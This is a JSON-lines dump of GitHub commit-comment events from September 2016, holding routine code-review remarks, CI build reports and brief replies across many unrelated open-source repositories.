{"id":"4609954524","type":"CommitCommentEvent","actor":{"login":"inikolov89"},"repo":{"name":"inikolov89/pebble-routines"},"payload":{"comment":{"id":19150119,"position":null,"line":null,"path":null,"commit_id":"b4339ea7ccebdd1875eb84755cb191020c27c071","created_at":"2016-09-23T17:48:05Z","updated_at":"2016-09-23T17:48:05Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add initial settings page](https://trello.com/c/4k2CxYOS/17-add-initial-settings-page)"}},"created_at":"2016-09-23T17:48:05Z"}
{"id":"4609956217","type":"CommitCommentEvent","actor":{"login":"aeoncleanse"},"repo":{"name":"FAForever/fa"},"payload":{"comment":{"id":19150121,"position":39,"line":59,"path":"lua/SimPing.lua","commit_id":"df7216d39f3dc6dc5aeeab231b4c8b6cbbbfcec1","created_at":"2016-09-23T17:48:23Z","updated_at":"2016-09-23T17:48:23Z","body":"Can we not just do brain:DoPingCallbacks? "}},"created_at":"2016-09-23T17:48:23Z"}
{"id":"4609961847","type":"CommitCommentEvent","actor":{"login":"maxbates"},"repo":{"name":"autodesk-bionano/genome-designer"},"payload":{"comment":{"id":19150154,"position":5,"line":24,"path":"test-e2e/nightwatch.js","commit_id":"3f215c53a7041a86b6229fe305e787870b5c3174","created_at":"2016-09-23T17:49:31Z","updated_at":"2016-09-23T17:49:31Z","body":"make a new config? This one is for local testing. i.e. in travis before deployed"}},"created_at":"2016-09-23T17:49:31Z"}
{"id":"4609964559","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19150171,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T17:50:03Z","updated_at":"2016-09-23T17:50:03Z","body":"Unit test created in 8250a90"}},"created_at":"2016-09-23T17:50:03Z"}
{"id":"4609965010","type":"CommitCommentEvent","actor":{"login":"sirlatrom"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19150174,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T17:50:10Z","updated_at":"2016-09-23T17:50:10Z","body":"I've probably just stared myself blind, but I can't seem to find the line(s) that will make another attempt. If `(backoff + backoffIncrement) <= maxBackoff`, the conditional block will be skipped and the thread executed by `restartClient()` will return without exception, no?"}},"created_at":"2016-09-23T17:50:10Z"}
{"id":"4609968402","type":"CommitCommentEvent","actor":{"login":"andy-ms"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19150193,"position":null,"line":null,"path":null,"commit_id":"1adaa22d7a6cc83ce09638e2cae00fc6f6589857","created_at":"2016-09-23T17:50:48Z","updated_at":"2016-09-23T17:50:48Z","body":"@kunnix Unfortunately, we don't yet support for multiple side-by-side versions of a library, so people using version 0.7 will have to stick to using an old `@types` version.\r\nThe leaflet version was bumped in #9659; `@types` bases its version number on the version in the header. Ideally, large changes to a type definition would only happen when there was a corresponding change in the library, and thus in the library's version number.\r\n\r\nI hope `@types/leaflet@1.0.34` will be more backwards-compatible with `@types/leaflet@1.0.32`. For progress on this see  #11445."}},"created_at":"2016-09-23T17:50:48Z"}
{"id":"4609971932","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19150214,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T17:51:29Z","updated_at":"2016-09-23T17:51:29Z","body":"fredagen den 23 september 2016 09.13.28 skrev  Fran Boon:\n> We don't want to simply use s3_impersonate as we don't want to switch IDs\n> in other flows.\n> We /could/ store the current user_id (if available) s3_impersonate to the\n> verifying user & then s3_impersonate back again (if there was such a user).\n> This all seems very clumsy though when a simple auth.override does the job\n> (we don't really need to store the fact that it was this user who approved\n> themselves)\nYeah - I said that this logic didn't take automatic approval into account, \njust explaining the reason why it was how it was.\n\nBut my proposed solution solves exactly that by parametrising the approved_by \n(maybe you overlooked that?), thereby eliminating the need for either \nauth.override or s3_impersonate.\n\nAutomatic approval by system authority would then just require to specify \napproved_by=0 in the call. I think that is exactly what you need for your case \n- and it would make it obvious in the call that this is automatic approval.\n\nEqually, you can delegate approval to any user you want by just specifying \ntheir user_id.\n\nOnly without approved_by in the parameters, it would fall back to the current \nuser (which is what front-end controllers want to do).\n\nI think that is straight-forward, and absolutely intuitive, self-documenting \nat the caller-level - and it eliminates overheads (so all totally contrary to \nwhat you say about it - I can't see why you would reject it).\n\nDominic\n"}},"created_at":"2016-09-23T17:51:29Z"}
{"id":"4609984646","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19150281,"position":1,"line":0,"path":"JMMServer/JMMServiceImplementationImage.cs","commit_id":"8faa32f135b281728454adb36578ccacdea43403","created_at":"2016-09-23T17:53:58Z","updated_at":"2016-09-23T17:53:58Z","body":"it's JMM server rest. it returns a file stream though"}},"created_at":"2016-09-23T17:53:58Z"}
{"id":"4609987206","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19150286,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-23T17:54:28Z","updated_at":"2016-09-23T17:54:28Z","body":"Vlad, did you see: https://github.com/h2oai/sparkling-water/compare/JH_SW-178 ? It is larger change implemented in this branch.\r\n\r\n"}},"created_at":"2016-09-23T17:54:28Z"}
{"id":"4609989658","type":"CommitCommentEvent","actor":{"login":"Peter-Wilson"},"repo":{"name":"Peter-Wilson/Flock"},"payload":{"comment":{"id":19150288,"position":null,"line":null,"path":null,"commit_id":"04c77666f953cd0450f5d6e79908922ed361edfe","created_at":"2016-09-23T17:54:56Z","updated_at":"2016-09-23T17:54:56Z","body":"That's right. One way that we can speed it up would be to potentially put the 'verify' portion in its own thread. Meaning it will only need to do the 'detect' portion on the login page, allowing them to take another if no person was detected in the picture."}},"created_at":"2016-09-23T17:54:56Z"}
{"id":"4609991302","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19150292,"position":7,"line":282,"path":"data/ai/lua/ca_high_xp_attack.lua","commit_id":"20a8a2f456642cd7c351976e1981ff098d228353","created_at":"2016-09-23T17:55:14Z","updated_at":"2016-09-23T17:55:14Z","body":"Wait, this difference should be masked by the API. :| What's going on here?"}},"created_at":"2016-09-23T17:55:14Z"}
{"id":"4609993944","type":"CommitCommentEvent","actor":{"login":"Peter-Wilson"},"repo":{"name":"Peter-Wilson/Flock"},"payload":{"comment":{"id":19150300,"position":null,"line":null,"path":null,"commit_id":"04c77666f953cd0450f5d6e79908922ed361edfe","created_at":"2016-09-23T17:55:42Z","updated_at":"2016-09-23T17:55:42Z","body":"A pop-up spinner is easy enough. I can work on that."}},"created_at":"2016-09-23T17:55:42Z"}
{"id":"4609994467","type":"CommitCommentEvent","actor":{"login":"taylor13"},"repo":{"name":"PCMDI/obs4MIPs-cmor-tables"},"payload":{"comment":{"id":19150302,"position":null,"line":null,"path":null,"commit_id":"8e92786a2cfa629bf805fd4bea446bab086c8728","created_at":"2016-09-23T17:55:49Z","updated_at":"2016-09-23T17:55:49Z","body":"I like it.  format suggestion:  Would be good to start the description of what \"institution\" should include on a new line."}},"created_at":"2016-09-23T17:55:49Z"}
{"id":"4609997837","type":"CommitCommentEvent","actor":{"login":"james-prior"},"repo":{"name":"cohpy/challenge-201608-refactor"},"payload":{"comment":{"id":19150313,"position":null,"line":null,"path":null,"commit_id":"8c242cf8dadeb494061419be1adf69d581b3db5f","created_at":"2016-09-23T17:56:27Z","updated_at":"2016-09-23T17:56:27Z","body":"Once it gets that complicated, exploits start creeping in."}},"created_at":"2016-09-23T17:56:27Z"}
{"id":"4610002442","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"khorolets/flask-restplus-server-example"},"payload":{"comment":{"id":19150327,"position":12,"line":112,"path":"flask_restplus_patched/namespace.py","commit_id":"d399b15e9c3391b6c36041b18e8548761dfe1cef","created_at":"2016-09-23T17:57:23Z","updated_at":"2016-09-23T17:57:23Z","body":"Please, add `_http.py` file in `flask_restplus_patched` folder with try to import `from http import HTTPStatus` and fallback to a constant class with the following access:\r\n\r\n```python\r\nfrom ._http import HTTPStatus\r\n\r\nHTTPStatus.NO_CONTENT  # 204\r\n```\r\n\r\nOnce it is done, replace these `204` hardcodings with the proper const."}},"created_at":"2016-09-23T17:57:23Z"}
{"id":"4610004006","type":"CommitCommentEvent","actor":{"login":"psyborg55"},"repo":{"name":"xdarklight/mktplinkfw3"},"payload":{"comment":{"id":19150331,"position":null,"line":null,"path":null,"commit_id":"be60f7470c133db2953653924e1e1cba1f0c0ced","created_at":"2016-09-23T17:57:41Z","updated_at":"2016-09-23T17:57:41Z","body":"ok, so the public key needs to be extracted from lib/libcmm.so in order to run script that will extract the signature from tplink image.\r\n\r\nonce extracted, is this signature or any part of it further used when creating a signature with a private key? (this key should be unique, or i could generate one?)\r\n\r\ni have compiled an image that will most likely boot on the device without problems, however seems like it won't flash because it is not signed. so as far as i get it i should merge that image with u-boot and resign complete image? would it be enough to sign only the built openwrt image?"}},"created_at":"2016-09-23T17:57:41Z"}
{"id":"4610005052","type":"CommitCommentEvent","actor":{"login":"maksymkovalenko"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19150333,"position":135,"line":404,"path":"spring-web-reactive/src/test/java/org/springframework/web/reactive/result/method/annotation/RequestMappingMessageConversionIntegrationTests.java","commit_id":"48d67a245b0d7742a6a2bf0b5e801c5e00bc91bf","created_at":"2016-09-23T17:57:53Z","updated_at":"2016-09-23T17:57:53Z","body":"What's not clear is how to control HTTP status code when `Observable` (or `Single`) returns error. For example, depending on the error, I might want to return specific error code (and maybe body). Even in success case, I might want to return `200` or `204`.\r\nTest does not demonstrate this, what's the recipe?"}},"created_at":"2016-09-23T17:57:53Z"}
{"id":"4610006623","type":"CommitCommentEvent","actor":{"login":"khorolets"},"repo":{"name":"khorolets/flask-restplus-server-example"},"payload":{"comment":{"id":19150337,"position":12,"line":112,"path":"flask_restplus_patched/namespace.py","commit_id":"d399b15e9c3391b6c36041b18e8548761dfe1cef","created_at":"2016-09-23T17:58:11Z","updated_at":"2016-09-23T17:58:11Z","body":"Nice idea!"}},"created_at":"2016-09-23T17:58:11Z"}
{"id":"4610007218","type":"CommitCommentEvent","actor":{"login":"n054"},"repo":{"name":"n054/android_hardware_qcom_mm-core"},"payload":{"comment":{"id":19150340,"position":null,"line":null,"path":null,"commit_id":"5a5e5b3708487038518f86431c212aea3d53b0d4","created_at":"2016-09-23T17:58:18Z","updated_at":"2016-09-23T17:58:18Z","body":"$  git push origin"}},"created_at":"2016-09-23T17:58:18Z"}
{"id":"4610015099","type":"CommitCommentEvent","actor":{"login":"hookblood"},"repo":{"name":"hookblood/test"},"payload":{"comment":{"id":19150354,"position":null,"line":null,"path":null,"commit_id":"650b556c7b75231176aaa67c0af809b3a1346956","created_at":"2016-09-23T17:59:53Z","updated_at":"2016-09-23T17:59:53Z","body":"可以"}},"created_at":"2016-09-23T17:59:53Z"}
{"id":"4610018151","type":"CommitCommentEvent","actor":{"login":"spyoungtech"},"repo":{"name":"robertlugg/easygui"},"payload":{"comment":{"id":19150366,"position":542,"line":374,"path":"easygui/boxes/button_box.py","commit_id":"eb3d2f875820aae332087e3c9e06ea38d113e6fa","created_at":"2016-09-23T18:00:28Z","updated_at":"2016-09-23T18:00:28Z","body":"Was there a particular reason why the message areas were changed from Message widgets to Text widgets for buttonbox and other boxes? Looks a bit odd compared to previous implementation of the message field. Perhaps a background could be added to match the parent frame? See   #99 "}},"created_at":"2016-09-23T18:00:28Z"}
{"id":"4610021543","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19150384,"position":52,"line":0,"path":"libraries/tools/kotlin-stdlib-gen/src/templates/SpecialJS.kt","commit_id":"29b19eea6895d61ad143224e4705c0d4c007e26d","created_at":"2016-09-23T18:01:06Z","updated_at":"2016-09-23T18:01:06Z","body":"What about Array.toString(), should it be deep or shallow or something else?\nHard to test shallowness, because the output platform specific."}},"created_at":"2016-09-23T18:01:06Z"}
{"id":"4610024415","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"emacs-berlin/general-close"},"payload":{"comment":{"id":19150392,"position":null,"line":null,"path":null,"commit_id":"4544040b3498d7f734ecce251708cd70089cd63b","created_at":"2016-09-23T18:01:38Z","updated_at":"2016-09-23T18:01:38Z","body":"Great, thank! Take your time."}},"created_at":"2016-09-23T18:01:38Z"}
{"id":"4610025712","type":"CommitCommentEvent","actor":{"login":"mhsieh"},"repo":{"name":"PacificBiosciences/pitchfork"},"payload":{"comment":{"id":19150394,"position":null,"line":null,"path":null,"commit_id":"16c3f70a5120ed7051402b22b4ee7fa0ad719786","created_at":"2016-09-23T18:01:54Z","updated_at":"2016-09-23T18:01:54Z","body":"#292"}},"created_at":"2016-09-23T18:01:54Z"}
{"id":"4610027125","type":"CommitCommentEvent","actor":{"login":"sforshee"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19150401,"position":12,"line":1532,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T18:02:11Z","updated_at":"2016-09-23T18:02:11Z","body":"The idea is that do_init sets this if the kernel supports ACLs and the fs has provided the callbacks. But yes, the fs could do something silly and cause a segfault I suppose, so I guess we should check.\r\n\r\nThe question is, if that happens should we call the setxattr op or respond with ENOSYS? I favor the latter."}},"created_at":"2016-09-23T18:02:11Z"}
{"id":"4610027380","type":"CommitCommentEvent","actor":{"login":"sforshee"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19150402,"position":30,"line":1548,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T18:02:14Z","updated_at":"2016-09-23T18:02:14Z","body":"See response above."}},"created_at":"2016-09-23T18:02:14Z"}
{"id":"4610027552","type":"CommitCommentEvent","actor":{"login":"sforshee"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19150403,"position":42,"line":1570,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T18:02:17Z","updated_at":"2016-09-23T18:02:17Z","body":"See response above."}},"created_at":"2016-09-23T18:02:17Z"}
{"id":"4610027560","type":"CommitCommentEvent","actor":{"login":"mhsieh"},"repo":{"name":"PacificBiosciences/pitchfork"},"payload":{"comment":{"id":19150404,"position":null,"line":null,"path":null,"commit_id":"46ba7e5225e6cd04c24e77b1f340e418cf49bd75","created_at":"2016-09-23T18:02:17Z","updated_at":"2016-09-23T18:02:17Z","body":"#292"}},"created_at":"2016-09-23T18:02:17Z"}
{"id":"4610027844","type":"CommitCommentEvent","actor":{"login":"sforshee"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19150405,"position":62,"line":1942,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T18:02:19Z","updated_at":"2016-09-23T18:02:19Z","body":"The implied default_permissions is a change to the original kernel patches, so it makes sense to reconsider this now.\r\n\r\nIt looks to me like the usual way of handling these flags is for fuse_lowlevel to set them and the filesystem clear any it doesn't want, so any change would be a departure from that convention. I frankly don't think I'm best qualified to decide what's right here, so I'd appreciate feedback."}},"created_at":"2016-09-23T18:02:19Z"}
{"id":"4610037011","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"khorolets/flask-restplus-server-example"},"payload":{"comment":{"id":19150435,"position":18,"line":121,"path":"flask_restplus_patched/namespace.py","commit_id":"d399b15e9c3391b6c36041b18e8548761dfe1cef","created_at":"2016-09-23T18:04:09Z","updated_at":"2016-09-23T18:04:09Z","body":"Please, add a default description text for HTTP/204 here. In Python 3.5 there is `http.HTTPStatus.NO_CONTENT.description`: `'Request fulfilled, nothing follows'`"}},"created_at":"2016-09-23T18:04:09Z"}
{"id":"4610042669","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19150445,"position":null,"line":null,"path":null,"commit_id":"a4f98f3e45980b11fdc4859469834736b5882f40","created_at":"2016-09-23T18:04:59Z","updated_at":"2016-09-23T18:04:59Z","body":"Actualizo a la versión commit: https://github.com/DjangoGirls/tutorial/commit/f11f359bd3b1f044f33e5bd77ff796fc17670f7c \r\nDiferencias tutorial/en/django_urls$ git diff f11f359bd3b1f044f33e5bd77ff796fc17670f7c ."}},"created_at":"2016-09-23T18:04:59Z"}
{"id":"4610047186","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19150460,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-23T18:05:52Z","updated_at":"2016-09-23T18:05:52Z","body":"because it works"}},"created_at":"2016-09-23T18:05:52Z"}
{"id":"4610049272","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":19150471,"position":null,"line":null,"path":null,"commit_id":"7883a3c1ebbc4c7c212d7d6db78029f62f0e61da","created_at":"2016-09-23T18:06:17Z","updated_at":"2016-09-23T18:06:17Z","body":"kek"}},"created_at":"2016-09-23T18:06:17Z"}
{"id":"4610051077","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"khorolets/flask-restplus-server-example"},"payload":{"comment":{"id":19150479,"position":82,"line":166,"path":"flask_restplus_patched/namespace.py","commit_id":"d399b15e9c3391b6c36041b18e8548761dfe1cef","created_at":"2016-09-23T18:06:40Z","updated_at":"2016-09-23T18:06:40Z","body":"I think this function call can now be joined into one line, can't it?"}},"created_at":"2016-09-23T18:06:40Z"}
{"id":"4610054710","type":"CommitCommentEvent","actor":{"login":"olizit"},"repo":{"name":"skyarkhangel/Hardcore-SK"},"payload":{"comment":{"id":19150490,"position":null,"line":null,"path":null,"commit_id":"4a6a4374fc5f8edd07750c384e569013024c49e6","created_at":"2016-09-23T18:07:24Z","updated_at":"2016-09-23T18:07:24Z","body":"Many thanks to use my pull request ! Awesome !"}},"created_at":"2016-09-23T18:07:24Z"}
{"id":"4610056767","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19150499,"position":null,"line":null,"path":null,"commit_id":"1f2df79556369665deb4219c4e66fcbc4f5d6902","created_at":"2016-09-23T18:07:51Z","updated_at":"2016-09-23T18:07:51Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2315 of 2495 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1f2df79556369665deb4219c4e66fcbc4f5d6902-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1f2df79556369665deb4219c4e66fcbc4f5d6902-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T18:07:51Z"}
{"id":"4610065558","type":"CommitCommentEvent","actor":{"login":"airborn"},"repo":{"name":"jvm-bloggers/jvm-bloggers"},"payload":{"comment":{"id":19150524,"position":5,"line":7,"path":"src/main/java/com/jvm_bloggers/TimeConstants.java","commit_id":"d5e7a5790afaaf1f13429452e32bd41724237b6e","created_at":"2016-09-23T18:09:36Z","updated_at":"2016-09-23T18:09:36Z","body":"We should rename this var ;)"}},"created_at":"2016-09-23T18:09:36Z"}
{"id":"4610067111","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19150527,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-23T18:09:55Z","updated_at":"2016-09-23T18:09:55Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T18:09:55Z"}
{"id":"4610067486","type":"CommitCommentEvent","actor":{"login":"PaulWoodIII"},"repo":{"name":"syburris/JSONBook"},"payload":{"comment":{"id":19150528,"position":3,"line":1,"path":"book.json","commit_id":"b22480804f5af55044ffe79d04f13c57e4a617b7","created_at":"2016-09-23T18:09:59Z","updated_at":"2016-09-23T18:09:59Z","body":"What a great addition to this project! We know what to read now"}},"created_at":"2016-09-23T18:09:59Z"}
{"id":"4610075684","type":"CommitCommentEvent","actor":{"login":"Orvid"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19150549,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T18:11:38Z","updated_at":"2016-09-23T18:11:38Z","body":"How did we manage that?"}},"created_at":"2016-09-23T18:11:38Z"}
{"id":"4610080038","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19150561,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T18:12:32Z","updated_at":"2016-09-23T18:12:32Z","body":"fredagen den 23 september 2016 10.06.27 skrev  Fran Boon:\n> Ah yes, I missed the possibility to pass approved_by = 0\n> OK, if you are happier with this then fine\nAbsolutely I'm happier with this!\n\nThe function wasn't originally designed for auto-approval by system authority, \nbut if we are to implement that now (and it seems useful), then explicit is so \nmuch better than implicit.\n\nNot only because it removes overheads and uncertainty - but also because it \nmoves the decision into the caller, hence makes the intent of the call clearly \nvisible. No implicit looking up of a user ID, but just straight and explicit \napproved_by=0 (or any other default approver where required).\n\nClean, intuitive, self-documenting. Less pain, fewer doubts.\n\nI think that is exactly how we want it - just trust me, sometimes ;)\n"}},"created_at":"2016-09-23T18:12:32Z"}
{"id":"4610080125","type":"CommitCommentEvent","actor":{"login":"TimOPI"},"repo":{"name":"TimOPI/school-meals"},"payload":{"comment":{"id":19150562,"position":7,"line":25,"path":"src/components/application/slides/OtherChildren.jsx","commit_id":"b1ee90897b794cd0c592622ad34f5330dadefda4","created_at":"2016-09-23T18:12:33Z","updated_at":"2016-09-23T18:12:33Z","body":"Double spaced between \"adults.  Other\", please reduce to one space."}},"created_at":"2016-09-23T18:12:33Z"}
{"id":"4610081629","type":"CommitCommentEvent","actor":{"login":"axptwig"},"repo":{"name":"mmetro/WeirdSideofYouTube"},"payload":{"comment":{"id":19150574,"position":null,"line":null,"path":null,"commit_id":"7e89550fdeaae7e30b3976f21c681f178610dca0","created_at":"2016-09-23T18:12:51Z","updated_at":"2016-09-23T18:12:51Z","body":"RIck Writing the codeeeeeeeeeeeeeeeeeee~"}},"created_at":"2016-09-23T18:12:51Z"}
{"id":"4610082833","type":"CommitCommentEvent","actor":{"login":"chobberoni"},"repo":{"name":"HospitalRun/hospitalrun-frontend"},"payload":{"comment":{"id":19150576,"position":null,"line":null,"path":null,"commit_id":"4d077f268a0e6ff376931339843c9f16f97caa26","created_at":"2016-09-23T18:13:06Z","updated_at":"2016-09-23T18:13:06Z","body":"thanks so much for this updated to the readme. I was literally troubleshooting for hours the other night because I had CouchDB 2.0 and the instructions _before_ didn't work well with that setup.\r\n\r\n🙏 "}},"created_at":"2016-09-23T18:13:06Z"}
{"id":"4610092455","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19150605,"position":null,"line":null,"path":null,"commit_id":"d929d89f6eb3a7dff015816266248f3326deaa93","created_at":"2016-09-23T18:15:01Z","updated_at":"2016-09-23T18:15:01Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.262.d929d89f6eb3a7dff015816266248f3326deaa93](http://build.palaso.org/viewLog.html?buildId=77097&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:14"}},"created_at":"2016-09-23T18:15:01Z"}
{"id":"4610094879","type":"CommitCommentEvent","actor":{"login":"hokein"},"repo":{"name":"electron/electron-docs-linter"},"payload":{"comment":{"id":19150611,"position":2,"line":1,"path":"README.md","commit_id":"6bfe579781031dce72dc8deb715d7e48c6a6e6d7","created_at":"2016-09-23T18:15:30Z","updated_at":"2016-09-23T18:15:30Z","body":"Looks like an extra blank was added by accident."}},"created_at":"2016-09-23T18:15:30Z"}
{"id":"4610099304","type":"CommitCommentEvent","actor":{"login":"Re2016Final"},"repo":{"name":"Re2016Final/P2016Final"},"payload":{"comment":{"id":19150623,"position":null,"line":null,"path":null,"commit_id":"82f8a3cf2f4e74ee643a3834c8a3bb4d56b2c0ec","created_at":"2016-09-23T18:16:21Z","updated_at":"2016-09-23T18:16:21Z","body":"Line 11 has a typo, fixed."}},"created_at":"2016-09-23T18:16:21Z"}
{"id":"4610099485","type":"CommitCommentEvent","actor":{"login":"kalinochkind"},"repo":{"name":"kalinochkind/vkbot"},"payload":{"comment":{"id":19150624,"position":6,"line":219,"path":"inf.py","commit_id":"cb0b59d77b313579f19d0e5dbb08f3a455e40add","created_at":"2016-09-23T18:16:23Z","updated_at":"2016-09-23T18:16:23Z","body":"API bug?"}},"created_at":"2016-09-23T18:16:23Z"}
{"id":"4610101164","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19150628,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T18:16:41Z","updated_at":"2016-09-23T18:16:41Z","body":"The last 3 mails were irrelevant as the last thing I posted was:\r\n\"Ah yes, I missed the possibility to pass approved_by = 0\r\nOK, if you are happier with this then fine :)\""}},"created_at":"2016-09-23T18:16:41Z"}
{"id":"4610104091","type":"CommitCommentEvent","actor":{"login":"atheurer"},"repo":{"name":"k-rister/lua-trafficgen"},"payload":{"comment":{"id":19150635,"position":null,"line":null,"path":null,"commit_id":"45814e59bd160e160a103c9f24cff5b7528e7728","created_at":"2016-09-23T18:17:15Z","updated_at":"2016-09-23T18:17:15Z","body":"I am fine with it, but I want it optional because it seems like certain setups get this no matter what."}},"created_at":"2016-09-23T18:17:15Z"}
{"id":"4610109332","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19150653,"position":6,"line":21,"path":"libselinux/src/callbacks.c","commit_id":"109cece8014790f9220eaf78e650dddf41d69a8f","created_at":"2016-09-23T18:18:21Z","updated_at":"2016-09-23T18:18:21Z","body":"Let's just delete this entirely.  IMHO it is wrong to entirely silence log output from libselinux just because the system has SELinux disabled.  They should have instead modified the specific caller(s) to set the logging callback and silence if appropriate."}},"created_at":"2016-09-23T18:18:21Z"}
{"id":"4610109387","type":"CommitCommentEvent","actor":{"login":"dhirajsb"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19150654,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T18:18:21Z","updated_at":"2016-09-23T18:18:21Z","body":"Yeah, it's a tricky bit of recursive code. The last back off increment check at the top will fail when the back off is exceeded with no error, which will cause the previous doStart to fail (not handshook), which will then end up in the block below to report the error.\r\nSo the first check is to ignore the restart attempt after backoff exceeds maxbackoff, and the second check reports error after failing the last attempt. "}},"created_at":"2016-09-23T18:18:21Z"}
{"id":"4610109583","type":"CommitCommentEvent","actor":{"login":"spershin"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19150656,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T18:18:23Z","updated_at":"2016-09-23T18:18:23Z","body":"FB Wangle still uses this method (it hadn't been updated as far as I can see).\r\nSee two top issues here: https://github.com/facebook/wangle/issues\r\n"}},"created_at":"2016-09-23T18:18:23Z"}
